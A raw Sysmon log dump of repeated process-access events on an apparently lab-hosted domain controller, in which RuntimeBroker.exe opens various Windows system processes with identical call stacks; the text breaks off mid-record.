13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.d